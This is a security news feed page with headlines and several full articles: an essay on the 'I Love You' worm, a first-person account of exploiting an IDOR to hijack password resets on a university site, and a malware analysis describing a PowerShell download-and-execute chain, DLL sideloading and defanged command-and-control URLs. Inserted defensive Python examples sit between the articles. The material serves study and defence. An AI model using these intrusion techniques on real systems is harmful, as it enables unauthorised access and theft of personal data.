The critical update was published on December 3, 2024, with the patch applied in Veeam Service Provider Console 8.1.0.21999. Service providers using earlier versions (including builds from version 7) are advised to upgrade to the latest version to safeguard their systems. The Veeam Service Provider Console vulnerabilities impact version 8.1.0.21377 and all prior versions in the 8.x and 7.x series. However, Veeam notes that if private fixes were applied to any of these versions, the build number may exceed the general availability (GA) version. In such cases, any deployed build lower than the solution build number (8.1.0.21999) should be considered vulnerable.

For Veeam users who have not yet updated their systems, this is a critical reminder to ensure they are operating on the most recent, secure version of the VSPC. Those who fail to act could leave their systems vulnerable to potential attacks that could lead to data loss or security breaches.

Conclusion

Organizations using Veeam Service Provider Console are strongly advised to upgrade to the latest available build, 8.1.0.21999, to protect themselves from the vulnerabilities CVE-2024-42448 and CVE-2024-42449. These vulnerabilities present serious risks, including the possibility of Remote Code Execution and NTLM hash leaks, which could lead to further data loss, system compromises, and escalating attacks. As with any security vulnerability, timely patching is the best defense against potential exploits. Service providers and users of the affected Veeam versions should not delay the update process.
by The Cyber Express
2024-12-05 11:48:25
Russia’s Secret Blizzard Hacked Rival Hackers’ Networks for EspionageIn an extraordinary case of cyber-espionage, the Russian state-sponsored group Secret Blizzard has been revealed to have hijacked the infrastructure of other hacking groups for its operations, with a recent campaign targeting the Pakistan-based espionage cluster Storm-0156 (also known as SideCopy, Transparent Tribe, or APT36). Secret Blizzard, identified by the U.S. Cybersecurity and Infrastructure Security … The post Russia’s Secret Blizzard Hacked Rival Hackers’ Networks for Espionage appeared first on CyberInsider.
by Cyber Insider
2024-12-05 11:36:52
SurePath AI Discover classifies AI use by intent and detects sensitive data violationsSurePath AI launched SurePath AI Discover, a new offering that provides visibility into a company’s employee use of public AI services. By classifying AI use by intent and identifying sensitive data violations, companies can better understand the volume, use case, and risk of AI use across their organization. “Our launch of the GenAI discovery program creates a first-in-industry solution for our launch partners,” said Jim Melton, VP of Alliance at SurePath AI. “We are excited … More → The post SurePath AI Discover classifies AI use by intent and detects sensitive data violations appeared first on Help Net Security.
by Help Net Security
2024-12-05 11:30:00
System Two Security Emerges From Stealth With Detection Engineering SolutionSystem Two Security has emerged from stealth mode with a threat detection engineering solution and $7 million in seed funding. The post System Two Security Emerges From Stealth With Detection Engineering Solution appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 11:29:11
She Escaped an Abusive Marriage—Now She Helps Women Battle Cyber HarassmentInspired by her own experience of abuse, Nighat Dad fights for women’s social and digital rights in Pakistan and beyond.
by WIRED Security News
2024-12-05 11:20:30
Firebase URL Exploitation: Taking Over Android Databases Like a Pro! Free Read. Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-05 11:20:14
TryHackme’s Advent of Cyber 2024 — Day 04 Writeup. Day 4: I’m all atomic inside! Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-05 11:19:32
How I Broke Into My Dev Friend’s Website in Less Than 24 Hour. You know what they say about ‘bulletproof’ websites? They never are. My dev friend swore his site was unhackable. Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-05 11:18:38
The ‘I Love You’ That Broke the Internet: A Love Letter Turned Cyber Nightmare

What if a simple love letter could disrupt businesses, governments, and personal lives worldwide? In May 2000, a computer worm masquerading as affection did just that. Known as the “I Love You” virus, it combined social engineering with malicious code to become one of the most infamous and destructive cyberattacks in history. Beyond the billions of dollars in damages, the virus left an indelible mark on the world of cybersecurity. If you’re wondering how it all happened, let’s explore it together.

What Was the ‘I Love You’ Virus?

The “I Love You” virus, often regarded as one of the most destructive computer viruses in history, was a computer worm disguised as an innocent text file. Delivered via email, the message bore the enticing subject line “I Love You” and included an attachment named “LOVE-LETTER-FOR-YOU.txt.vbs.”

At first glance, the attachment appeared to be a harmless text file, but its “.vbs” extension revealed its true nature as a Visual Basic Script. Many users, unfamiliar with file extensions or scripting, unknowingly activated the malicious code by clicking on it. This attack became a classic case study of how social engineering in cybersecurity can manipulate human behavior to bypass technical defenses.

When executed, the script unleashed a chain reaction of damage. It overwrote files, stole passwords, and sent copies of itself to all the contacts in the recipient’s email address book. This simple trick leveraged human curiosity and trust to create one of the fastest-spreading worms in history.

The Scale of Its Impact

The “I Love You” virus caused widespread chaos, impacting organizations and individuals alike. High-profile victims included the Pentagon, the British Parliament, and media outlets like the BBC. Within the U.S. Army Forces Command alone, the virus infected over 2,258 workstations, leading to more than 12,000 hours of lost productivity and nearly $80,000 in recovery costs. Email systems were paralyzed, forcing many to revert to outdated communication methods like faxes and phone calls.

Entire operations ground to a halt as organizations shut down email servers to contain the spread. The financial toll was immense, with damages globally exceeding $10 billion. These devastating effects are part of the reason why the “I Love You” virus remains one of the most memorable and studied incidents in the history of cybersecurity.

The Mechanics of Its Spread

The “I Love You” virus used a combination of social engineering and automation to spread rapidly across the globe. When a victim opened the attachment named “LOVE-LETTER-FOR-YOU.txt.vbs,” the malicious Visual Basic Script (VBS) was executed. The worm accessed the Microsoft Outlook address book, iterated through all contacts, and created new emails with the subject line “I Love You” and the same malicious attachment. This automated replication turned each infected system into a distribution hub, allowing the virus to propagate exponentially.

The worm also infected the local system by targeting specific file types such as .jpg, .mp3, .css, .js, .vbs, and others. It replaced the contents of these files with its malicious script and, in some cases, created .vbs duplicates of files while deleting the original. For example, an image file named photo.jpg might be overwritten and saved as photo.jpg.vbs. This recursive behavior ensured that the infection spread further within the local environment.

Additionally, the worm altered the Windows registry to add itself to the startup programs, ensuring persistence across system reboots. By combining email propagation, local file overwriting, and registry modifications, the “I Love You” virus achieved one of the fastest and most widespread infections in history, leaving millions of systems compromised.

Challenges and Lessons Learned

The “I Love You” virus exposed significant gaps in cybersecurity preparedness and taught critical lessons that remain relevant today.

At the time, organizations struggled to respond effectively. Antivirus software updates were not immediately available, delaying mitigation efforts. Email systems were taken offline entirely to prevent further spread, disrupting operations on a massive scale. For example, within the U.S. Army, email outages highlighted the need for alternative communication channels and improved incident response plans.

This incident underscored the importance of proactive measures. Round-the-clock network monitoring, timely alerts, and robust backup systems could have minimized the impact. The virus also revealed the power of social engineering, showing that human curiosity and trust are often the weakest links in cybersecurity.

Organizations learned the value of education, emphasizing the need for user awareness training to recognize phishing attempts and suspicious files. File filtering and attachment scanning became essential practices in email security protocols. Regular updates to software and systems were recognized as critical for reducing vulnerabilities.

Ultimately, the “I Love You” virus served as a wake-up call, prompting a shift toward more resilient cybersecurity practices and coordinated responses to emerging threats. Its lessons remain vital for understanding how social engineering tactics continue to shape modern cybersecurity threats.

The “I Love You” virus stands as a stark reminder of the risks posed by social engineering and unprepared digital infrastructures. Disguised as a love letter, it exploited human curiosity and outdated technology to spread rapidly, causing billions in damages and disrupting critical operations across the globe. Its impact on organizations like the Pentagon, British Parliament, and U.S. Army exposed vulnerabilities and highlighted the need for stronger defenses, better user education, and coordinated responses to cyber threats.

By understanding the mechanics and fallout of the “I Love You” virus, we gain valuable insights into the evolution of cybersecurity and the importance of vigilance in a constantly changing digital landscape.

Stay vigilant, stay informed, and stay secure!

Thank You for Reading! Your interest and attention are greatly appreciated.

The ‘I Love You’ That Broke the Internet: A Love Letter Turned Cyber Nightmare was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
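The article above notes that the worm's attachment relied on a data-looking inner extension (".txt") in front of the script extension (".vbs"), and that attachment filtering became a standard email control afterwards. The following is an added example, not code from the article or from any product: a small attachment-name screen that judges a file by its final extension only and flags the masking pattern. The extension sets and the sample file names are constructed for illustration and are not exhaustive.

```python
# Added example (not from the article): screen e-mail attachment names for the
# "double extension" trick the worm used. Extension sets are constructed for
# illustration and are deliberately incomplete.
import os

# Extensions Windows runs as programs or scripts when double-clicked.
EXECUTABLE_EXTS = {
    ".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1",
    ".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".msi", ".lnk",
}
# Extensions a recipient would reasonably read as inert data.
DATA_EXTS = {".txt", ".jpg", ".jpeg", ".png", ".gif", ".pdf",
             ".doc", ".docx", ".mp3", ".zip"}


def split_extensions(filename):
    """All dotted suffixes of a file name, lower-cased and in order.

    'LOVE-LETTER-FOR-YOU.txt.vbs' -> ['.txt', '.vbs']
    """
    parts = os.path.basename(filename).lower().split(".")
    return ["." + p for p in parts[1:] if p]


def classify_attachment(filename):
    """Return a verdict dict: 'allow', 'block' or 'quarantine', with a reason."""
    exts = split_extensions(filename)
    if not exts:
        # Nothing to decide on: hold for inspection rather than guess.
        return {"name": filename, "verdict": "quarantine", "reason": "no extension"}
    final = exts[-1]
    if final in EXECUTABLE_EXTS:
        # Only the last extension decides what Windows executes; an inner
        # data-looking extension exists purely to mislead the reader.
        if len(exts) > 1 and exts[-2] in DATA_EXTS:
            reason = f"data-looking extension {exts[-2]} masks executable {final}"
        else:
            reason = f"executable attachment type {final}"
        return {"name": filename, "verdict": "block", "reason": reason}
    return {"name": filename, "verdict": "allow", "reason": "data file"}


def screen_message(attachment_names):
    """Verdicts for every attachment that must not be delivered as-is."""
    return [v for v in map(classify_attachment, attachment_names)
            if v["verdict"] != "allow"]


if __name__ == "__main__":
    # Constructed sample: the worm's attachment name beside harmless files.
    sample = ["photo.jpg", "LOVE-LETTER-FOR-YOU.txt.vbs", "invoice.pdf.exe", "README"]
    for verdict in screen_message(sample):
        print(verdict)
```

The screen keys on the final extension because that is the one the operating system acts on; Windows Explorer hides known extensions by default, which is why the inner ".txt" was all many recipients saw. A real gateway would pair this name check with content inspection, since a renamed file defeats any extension-only rule.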
2024-12-05 11:18:07
The Story of How I Hacked an International University in Indonesia

My friend suggested I sign up for a university to get a degree (such a thoughtful friend 🫡). He even sent me the registration link. Being my usual curious self, I decided to check out the website’s vulnerabilities.

I used temp-mail.org to get a temporary email for the registration process. After signing up, I got a verification link to activate my account. Once activated and logged in to the system, I opened the network panel, started analyzing the website’s requests, and stumbled upon some interesting URLs.

I copied the request as a cURL command, ran it, and got the response in JSON format. If I change the request and set the ID to 37, I get this response (Looks like I found an IDOR vulnerability before GTA 6 dropped 🙂↔️).

Turns out the website has an IDOR vulnerability that lets me access everyone’s data in the database. The best part? I can see their NIK (citizenship number), email, and even their password reset tokens which could easily lead to an account takeover. Alright, let me cook folks. 👨🍳

I went back to the login page and navigated to the reset password page to request a new password. As we can see, the link contains the user token, which we can access, thanks to the previous IDOR vulnerability. So, I decided to create a new user account just to hack myself 👻.

I requested a password reset and sent it to my other account. Then, I checked the user reset password token, replaced it with the token I grabbed earlier, and boom 💥 I successfully changed my other account’s password. This same trick could work on any account on the website.

After this little experiment, I reported the issue to their IT team and shared suggestions on how they could prevent this kind of attack in the future. 🛠️

What can we learn from this story?

If you come across a website using a front-end framework, that’s a win, it makes it easier to analyze the APIs they’re sending.
Find a friend who cares about your education ✌🏻; they might just send you a similar link 🥹
And remember: never trust user input. Always validate and sanitize!

Tools: https://curl.se/

The Story of How I Hacked an International University in Indonesia was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
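The write-up above describes two defects working together: an endpoint that returns any user's row for any id the client supplies, and a row that carries the live password-reset token. The following is an added example, not code from the write-up or from the university's system, showing the vulnerable handler shape beside a hardened one and a reset flow whose tokens never appear in an API response. The user table, field names (including "nik" for the national ID the story mentions) and the handler signatures are all constructed for this example.

```python
# Added example (not from the write-up): IDOR-prone handler beside a hardened one,
# plus a reset-token design that a row read cannot turn into an account takeover.
# All data and names below are constructed.
import hashlib
import hmac
import secrets
import time

USERS = {
    36: {"id": 36, "email": "alice@example.invalid", "nik": "CONSTRUCTED-NIK-36",
         "password_hash": None, "reset_token_hash": None, "reset_expires": 0.0},
    37: {"id": 37, "email": "bob@example.invalid", "nik": "CONSTRUCTED-NIK-37",
         "password_hash": None, "reset_token_hash": None, "reset_expires": 0.0},
}

# What a user may see about themselves through the API. Secrets are never listed.
PUBLIC_FIELDS = ("id", "email", "nik")


def handle_get_user_insecure(requester_id, target_id):
    """Vulnerable pattern: trusts the id in the URL and serialises the raw row."""
    row = USERS.get(target_id)
    if row is None:
        return 404, {"error": "not found"}
    return 200, dict(row)


def handle_get_user(requester_id, target_id):
    """Hardened: the session owner must match the requested object, and only an
    allow-listed projection of the row leaves the server."""
    row = USERS.get(target_id)
    if row is None:
        return 404, {"error": "not found"}
    if requester_id != target_id:
        # Authorisation comes from the authenticated session, never from the URL.
        return 403, {"error": "forbidden"}
    return 200, {k: row[k] for k in PUBLIC_FIELDS}


def _digest(value):
    return hashlib.sha256(value.encode()).hexdigest()


def request_password_reset(email, ttl_seconds=900, now=None):
    """Issue a single-use reset token, returned for delivery by e-mail only.
    Only its hash is stored, so reading the row yields nothing usable."""
    now = time.time() if now is None else now
    row = next((u for u in USERS.values() if u["email"] == email), None)
    if row is None:
        return None  # identical outward behaviour whether or not the address exists
    token = secrets.token_urlsafe(32)
    row["reset_token_hash"] = _digest(token)
    row["reset_expires"] = now + ttl_seconds
    return token


def handle_reset_password(token, new_password, now=None):
    """Consume a reset token: constant-time compare against the stored hash,
    reject expired tokens, and invalidate the token after one use."""
    now = time.time() if now is None else now
    presented = _digest(token)
    for row in USERS.values():
        stored = row["reset_token_hash"]
        if stored and hmac.compare_digest(stored, presented):
            if now > row["reset_expires"]:
                return 400, {"error": "token expired"}
            # Placeholder hash for the example; use a password KDF in production.
            row["password_hash"] = _digest(new_password)
            row["reset_token_hash"] = None
            row["reset_expires"] = 0.0
            return 200, {"id": row["id"]}
    return 400, {"error": "invalid token"}


def demo_reset_flow(now=1000.0):
    """Exercise the flow end to end; returns the status codes observed."""
    token = request_password_reset("bob@example.invalid", now=now)
    first = handle_reset_password(token, "new-password", now=now + 1)[0]
    replay = handle_reset_password(token, "new-password", now=now + 2)[0]
    stale = request_password_reset("alice@example.invalid", now=now)
    expired = handle_reset_password(stale, "x", now=now + 10_000)[0]
    return first, replay, expired
```

The two fixes are independent and both matter: the ownership check stops one user from reading another's row, and storing only a hash with a short expiry and single use means that even a future data leak of the table does not hand out working reset links.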
2024-12-05 11:17:00
NCA Busts Russian Crypto Networks Laundering Funds and Evading SanctionsThe U.K. National Crime Agency (NCA) on Wednesday announced that it led an international investigation to disrupt Russian money laundering networks that were found to facilitate serious and organized crime across the U.K., the Middle East, Russia, and South America. The effort, codenamed Operation Destabilise, has resulted in the arrest of 84 suspects linked to two Russian-speaking networks
by The Hacker News
2024-12-05 11:07:57
Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey BotKey takeaways Cyble Research and Intelligence Labs (CRIL) identified a malicious campaign targeting the manufacturing industry, leveraging a deceptive LNK file disguised as a PDF file. This campaign leverages multiple Living-off-the-Land Binaries (LOLBins), such as ssh.exe, powershell.exe, and mshta.exe, to bypass traditional security mechanisms and remotely execute the next-stage payload. The Threat Actor (TA) used Google Accelerated Mobile Pages (AMP) URL along with a shortened URL to evade detection by traditional URL scanners. The attack heavily relies on file injection techniques, where the TAs execute malicious payloads directly in memory to bypass conventional security mechanisms. The attack chain leverages DLL sideloading and IDATLoader to deploy the Lumma stealer and Amadey bot, enabling the attacker to gain control and exfiltrate sensitive information from the victim''s machine. Overview CRIL recently identified a multi-stage cyberattack campaign originating from an LNK file. The initial infection vector remains unknown; however, the attack likely begins with a spear-phishing email, prompting the recipient to click on a link that leads to an LNK shortcut file disguised as a PDF document. The file is hosted on a remote WebDAV share at ""hxxp://download-695-18112-001-webdav-logicaldoc[.]cdn-serveri4732-ns.shop/Downloads/18112.2022/Instruction_695-18121-002_Rev.PDF.lnk"". Upon searching for the file name “695-18121-002_Rev” on Google, we discovered a technical engineering drawing for a component. Additionally, we observed similar samples using the name “Instruction_18112,” which led us to another technical document detailing the installation of a chair. The malicious LNK file hosted on the URL impersonates LogicalDOC, a cloud-based document management system commonly used in Manufacturing and Engineering firms. 
Based on the targeting and nature of these attacks, we suspect that the campaign is likely targeting the manufacturing industry. Once executed, the LNK file triggers a command to launch ssh.exe, which subsequently runs a PowerShell command. This PowerShell command fetches and executes an additional malicious payload from a remote server using mshta.exe. The remote server is accessed via a URL that abuses Google’s Accelerated Mobile Pages (AMP) framework, combined with a shortened URL that redirects to a location hosting malicious PowerShell code. The PowerShell code then triggers another malicious script hosted on Pastebin, controlled by the TA. This script contains an encoded PowerShell command that downloads a ZIP archive to the Temp directory, extracts its contents, and executes a legitimate executable. The executable, in turn, sideloads a malicious DLL file. In this sophisticated campaign, the TA uses multiple stages of code injection to deploy the Lumma stealer, which then downloads the Amadey Bot onto the victim''s system. The figure below shows the infection chain. Figure 1 - Infection chain Technical Analysis Threat Actors are increasingly exploiting LNK files as their initial vector for malware distribution due to their flexibility in executing various commands. In this campaign, they specifically leveraged the Windows SSH client (C:\Windows\System32\OpenSSH\ssh.exe) as an alternative target in the LNK file’s “Target” field. This approach reduces the likelihood of detection compared to using cmd.exe or powershell.exe as the target. The image below shows the LNK command. Figure 2 - LNK using SSH as a target When a user opens the disguised LNK file, it triggers “ssh.exe” to run a PowerShell command through the ProxyCommand option in ssh.exe. The embedded PowerShell command contains obfuscated content, as shown in the image above. 
The de-obfuscated code attempts to execute PowerShell content hosted at the AMP URL ""hxxps://www.google[.]ca/amp/s/goo.su/IwPQJP"" using mshta.exe. In this case, the hosted content contains AES-encrypted data, as shown in the image below. Figure 3 - AES-encrypted content hosted in AMP URL Upon decryption, the data reveals Base64-encoded content, which is displayed in the image below. Figure 4 – Base64-encoded content The decoded Base64 content reveals an obfuscated PowerShell command, as shown in the image below. Figure 5 - Obfuscated PowerShell command This PowerShell command manipulates security protocols and performs the following actions: First, it configures various security protocols, including TLS 1.0, TLS 1.1, TLS 1.2, and SSL 3.0, using the .NET ServicePointManager class. Then, it initiates a web request using Invoke-WebRequest (iwr) to fetch a payload from the URL hxxps://Pastebin[.]com/raw/0v6Vhvpb, which is then immediately executed using Invoke-Expression (iex). The image below shows the retrieved payload from the Pastebin URL. Figure 6 - Partial PowerShell script fetched from the Pastebin URL The retrieved content from the Pastebin link consists of a PowerShell script that performs several actions: The script begins by sanitizing the content fetched from Pastebin, removing newline characters (""n"") and commas (,). The cleaned string is then decoded from Base64 into binary data. Using a hardcoded decryption key, the script decrypts the binary data. Once decrypted, the script extracts a portion of the data starting from the 64th byte to the end, which is the actual code to execute. This code is then converted into a readable PowerShell command using UTF-8 encoding. Before executing the decoded command, a 2-second delay is introduced with Start-Sleep. Finally, the decoded PowerShell command is executed in memory using Invoke-Expression. The image below shows the decrypted PowerShell code extracted using the above steps. 
Figure 7 - Decrypted PowerShell code The newly introduced script represents the final stage in delivering malicious files to the system. The script operates as follows: The script first verifies the system''s internet connectivity by sending HTTP requests to two distinct domains: 360.net and baidu.com. These requests ensure the system is online before proceeding with further actions. Once the victim’s system is connected to the internet, the script downloads a malicious CPL file named naailq0.cpl from the remote URL hxxps://berb.fitnessclub-filmfanatics.com/naailq0.cpl. The downloaded CPL file is saved as a ZIP file within the Temp directory. This ZIP file is then copied to a newly created folder under the LocalAppData folder. The folder name is dynamically generated using a GUID (Globally Unique Identifier). After extraction, the script scans the folder for any executable files (EXEs). Any EXE files found within the extracted contents are then executed. The script includes a commented-out line that, if activated, would delete the extracted files and folder after execution, potentially covering its tracks. The image below shows the contents of the downloaded ZIP file. The ZIP file also contains encrypted files, which will be decrypted and loaded in the subsequent stages of infection. Figure 8 - Extracted files in the archive In this case, the script executes “syncagentsrv.exe”, which performs DLL sideloading by loading the malicious “Qt5Network.dll” upon execution. The malicious DLL then reads an encrypted file named “shp” from the same directory, decrypts its contents, and reveals strings such as LoadLibraryA, VirtualProtect, and dbghelp.dll, as shown in the figure below. Figure 9 - Decrypted content After decryption, the malicious DLL extracts the string “dbghelp.dll” from the decrypted content and utilizes it to load the DLL via the LoadLibraryA API. The “dbghelp.dll” is a Microsoft Windows library designed for debugging and managing symbol information. 
After loading the DLL, the malicious code employs the VirtualProtect API to modify the memory region permissions of "dbghelp.dll" to PAGE_EXECUTE_READWRITE, as illustrated below.

Figure 10 - Modifying permission of dbghelp.dll

It then overwrites the contents of "dbghelp.dll" with the decrypted data and subsequently modifies the memory protection of the overwritten region to PAGE_EXECUTE_READ, as depicted below.

Figure 11 - Modifying the permissions of dbghelp.dll

After modifying the memory protection, the malicious code begins executing the injected content within "dbghelp.dll". The injected code then proceeds to read another file named "bwvrwtn", located in the same directory. The file "bwvrwtn" is an encrypted IDAT file containing multiple encrypted chunks, each prefixed with the string "IDAT," as illustrated below.

Figure 12 - IDAT marker

The DLL now searches for the string IDAT, takes the four bytes following IDAT, and compares them with C6 A5 79 EA. If the comparison succeeds, the DLL proceeds to copy all the data following IDAT into memory, decrypts it using the XOR key, and then decompresses the decrypted content using the RtlDecompressBuffer API, as shown below.

Figure 13 - Decompressed data

It then loads a legitimate "pla.dll" from the %syswow64% directory using the LoadLibraryW API. After loading, it changes the memory permissions of "pla.dll" to PAGE_EXECUTE_READWRITE, copies the decrypted content into its memory, changes the permissions to PAGE_EXECUTE_READ, and finally executes the injected code in the "pla.dll" as shown below.

Figure 14 - Executing the injected code

The code within "pla.dll" proceeds to inject malicious code into "more.com" and then executes it. The malicious code in "more.com" is responsible for deploying the final payload by injecting it into a newly created process, "msiexec.exe." The injected payload is Lumma Stealer, which is capable of stealing sensitive information from the victim's machine.
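The marker check described above is a useful triage signal on its own: a file on disk that holds several "IDAT"-tagged chunks, one of which is followed by C6 A5 79 EA, matches the layout the loader expects. The following is an added example written for this page (it is not Cyble's tooling and not the YARA rules the post links to) that walks a blob for IDAT tags, flags the chunk whose next four bytes equal the marker, and returns the bytes the loader would copy into memory. The sample input is constructed inline; the later XOR decryption and RtlDecompressBuffer step are not reproduced because the post does not give the key, and "data following IDAT" is read here as the bytes after the four-byte marker.

```python
import re
from dataclasses import dataclass
from typing import List

IDAT_TAG = b"IDAT"
# Marker the loader compares the four bytes after "IDAT" against (from the analysis above).
PAYLOAD_MARKER = bytes.fromhex("C6A579EA")


@dataclass
class IdatChunk:
    offset: int        # file offset of the "IDAT" tag
    marker: bytes      # the four bytes that follow the tag
    is_payload: bool   # True when marker == PAYLOAD_MARKER
    data_len: int      # bytes between the marker and the next tag (or EOF)


def find_idat_chunks(blob: bytes) -> List[IdatChunk]:
    """Locate every IDAT tag in `blob` and describe the chunk that follows it."""
    positions = [m.start() for m in re.finditer(re.escape(IDAT_TAG), blob)]
    chunks: List[IdatChunk] = []
    for i, pos in enumerate(positions):
        marker = blob[pos + 4:pos + 8]
        end = positions[i + 1] if i + 1 < len(positions) else len(blob)
        chunks.append(IdatChunk(
            offset=pos,
            marker=marker,
            is_payload=(marker == PAYLOAD_MARKER),
            data_len=max(0, end - (pos + 8)),
        ))
    return chunks


def is_idat_loader_candidate(blob: bytes) -> bool:
    """Verdict: at least one IDAT chunk carries the marker the loader looks for."""
    return any(c.is_payload for c in find_idat_chunks(blob))


def payload_region(blob: bytes) -> bytes:
    """Raw bytes the loader would copy into memory (still XOR-encrypted and
    compressed at this point), or b"" when no marked chunk is present."""
    for c in find_idat_chunks(blob):
        if c.is_payload:
            start = c.offset + 8
            return blob[start:start + c.data_len]
    return b""


def build_sample() -> bytes:
    """Constructed sample, not a real capture: a PNG signature, one decoy IDAT
    chunk with a non-matching marker, then the chunk whose marker matches."""
    decoy = IDAT_TAG + b"\x00\x00\x00\x10" + b"\x11" * 16
    marked = IDAT_TAG + PAYLOAD_MARKER + b"\x41" * 32
    return b"\x89PNG\r\n\x1a\n" + decoy + marked


if __name__ == "__main__":
    sample = build_sample()
    for chunk in find_idat_chunks(sample):
        print(f"IDAT @ {chunk.offset:#06x} marker={chunk.marker.hex()} "
              f"payload={chunk.is_payload} len={chunk.data_len}")
    print("IDAT loader candidate:", is_idat_loader_candidate(sample))
```

Run it over a suspect file with `is_idat_loader_candidate(open(path, "rb").read())`; a true verdict together with a sideloaded DLL in the same directory is the combination worth escalating, since legitimate PNG files never carry this particular four-byte value after a chunk tag by design.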
The figure below shows the memory string of "msiexec.exe" containing Lumma Stealer's C2 details.

Figure 15 - Msiexec Process memory strings

Amadey Bot

The TA behind this campaign also deploys the Amadey bot in the "%temp%" directory, employing the same technique of injecting code into "more.com." This injected code further injects the final Amadey bot payload into "explorer.exe". To achieve persistence, the malware creates a Task Scheduler entry named "NodeJS Web Framework." This task is configured to execute a copy of the Amadey bot stored in the %Appdata% directory, as illustrated below.

Figure 16 - Task Scheduler for Persistence

The figure below shows the execution flow of Lumma Stealer and Amadey bot.

Figure 17 - Execution Flow

Conclusion

This multi-stage cyberattack campaign demonstrates the increasing sophistication and adaptability of threat actors. By leveraging various evasion techniques such as URL shortening and AMP URLs, the attackers successfully bypass traditional security mechanisms. The use of legitimate system tools like ssh.exe and mshta.exe to execute malicious PowerShell commands further illustrates the complexity of the attack. The final payload, which involves the deployment of both Lumma stealer and Amadey bot, highlights the TA's intent to steal sensitive information and maintain persistent control over compromised systems. Yara and Sigma rules to detect this campaign are available for download from the linked Github repository.

Recommendations

- The initial breach may occur via spam emails. Therefore, it's advisable to deploy strong email filtering systems to identify and prevent the dissemination of harmful attachments.
- Exercise caution when handling email attachments or links, particularly those from unknown senders. Verify the sender's identity, particularly if an email seems suspicious.
- Disable WebDAV if it is not required for business operations to minimize potential attack vectors.
- Consider disabling the execution of shortcut files (.lnk) originating from remote locations, such as WebDAV links, or implementing policies that require explicit user consent before executing such files.
- The campaign abused the legitimate ssh utility; hence, it is advised to monitor the activities conducted by the ssh utility and restrict access to limited users.
- Consider limiting the execution of scripting languages, such as PowerShell and mshta.exe, on user workstations and servers if they are not essential.
- Implement application whitelisting to ensure only approved and trusted applications and DLLs can be executed on the systems.
- Monitor AMP links using advanced URL filtering and threat intelligence feeds to detect suspicious activity.
- Set up network-level monitoring to detect unusual activities or data exfiltration by malware. Block suspicious activities to prevent potential breaches.

MITRE ATT&CK® Techniques

Tactic | Technique | Procedure
Initial Access (TA0001) | Phishing (T1566) | The LNK file may be delivered through phishing or spam emails
Execution (TA0002) | User Execution: Malicious Link (T1204.001); Command and Scripting Interpreter: PowerShell (T1059.001) | Execution begins when a user executes the LNK file. The LNK file executes PowerShell commands.
Defense Evasion (TA0005) | Masquerading: Masquerade File Type (T1036.008) | Uses LNK files with altered icons to disguise as legitimate
Defense Evasion (TA0005) | System Binary Proxy Execution: Mshta (T1218.005) | Abuses mshta.exe to proxy execution of malicious files.
Defense Evasion (TA0005) | Obfuscated Files or Information (T1027) | Scripts include packed or encrypted data.
Defense Evasion (TA0005) | System Binary Proxy Execution: Msiexec (T1218.007) | msiexec.exe used for proxy execution of malicious payloads
Privilege Escalation (TA0004) | DLL Side-Loading (T1574.002) | Malicious DLL side-loaded.
Privilege Escalation (TA0004) | Process Injection (T1055) | Injects malicious content into explorer.exe and other processes.
Persistence (TA0002) | Scheduled Task/Job (T1053.005) | Adds a task scheduler entry for persistence.
C&C (TA0011) | Application Layer Protocol (T1071) | Malware communicates to the C&C server.
Exfiltration (TA0010) | Automated Exfiltration (T1020) | Data is exfiltrated after collection

Indicators Of Compromise

Indicator | Indicator Type | Description
5b6dc2ecb0f7f2e1ed759199822cb56f5b7bd993f3ef3dab0744c6746c952e36 | SHA-256 | Instruction_695-18121-002_Rev.PDF.lnk
8ed1af83cf70b363658165a339f45ae22d92c51841b06c568049d3636a04a2a8 | SHA-256 | Malicious PowerShell Script downloaded from Pastebin (0v6Vhvpb)
7b8958ed2fc491b8e43ffb239cdd757ec3d0db038a6d6291c0fd6eb2d977adc4 | SHA-256 | Zip file disguised as .cpl
dc36a3d95d9a476d773b961b15b188aa3aae0e0a875bca8857fca18c691ec250 | SHA-256 | Malicious DLL (Sideloaded)
hxxps://www.google[.]ca/amp/s/goo.su/IwPQJP | URL | remote servers
hxxps://pastebin[.]com/raw/0v6Vhvpb | URL | remote servers
hxxps://berb.fitnessclub-filmfanatics[.]com/naailq0.cpl | URL | remote servers
hxxp://download-695-18112-001-webdav-logicaldoc[.]cdn-serveri4732-ns.shop/Downloads/18112.2022/ | URL | WebDAV server link hosting malicious LNK file

References

https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-Lumma-infostealers
https://www.rapid7.com/blog/post/2024/03/28/stories-from-the-soc-part-1-idat-loader-to-bruteratel

The post Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot appeared first on Cyble.
by CYBLE
2024-12-05 11:04:45
Protecting the cloud: combating credential abuse and misconfigurations
To defend against two of today's biggest cloud security threats, organizations must adapt and develop proactive strategies, Google Cloud's Brian Roddy writes.
by Cybersecurity Dive
2024-12-05 11:00:48
Russian programmer says FSB agents planted spyware on his Android phone
Security researchers confirmed the programmer's phone had spyware, likely during a spell in Russian detention. The programmer told his story to TechCrunch. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-05 11:00:00
White House Says at Least 8 US Telecom Firms, Dozens of Nations Impacted by China Hacking Campaign
A top White House official said at least eight U.S. telecom firms and dozens of nations have been impacted by a Chinese hacking campaign. The post White House Says at Least 8 US Telecom Firms, Dozens of Nations Impacted by China Hacking Campaign appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 10:56:19
Q&A with Jonathan Armstrong: An Inside Look at CREST Accreditation
Explore the role of CREST accreditation in cybersecurity, its link to DORA, and insights from Jonathan Armstrong on its future in the security industry. The post Q&A with Jonathan Armstrong: An Inside Look at CREST Accreditation appeared first on NetSPI.
by NetSPI
2024-12-05 10:50:39
BT Investigating Hack After Ransomware Group Claims Theft of Sensitive Data
UK telecoms company BT has launched an investigation after the Black Basta ransomware group claimed the theft of 500 Gb of data. The post BT Investigating Hack After Ransomware Group Claims Theft of Sensitive Data appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 10:39:00
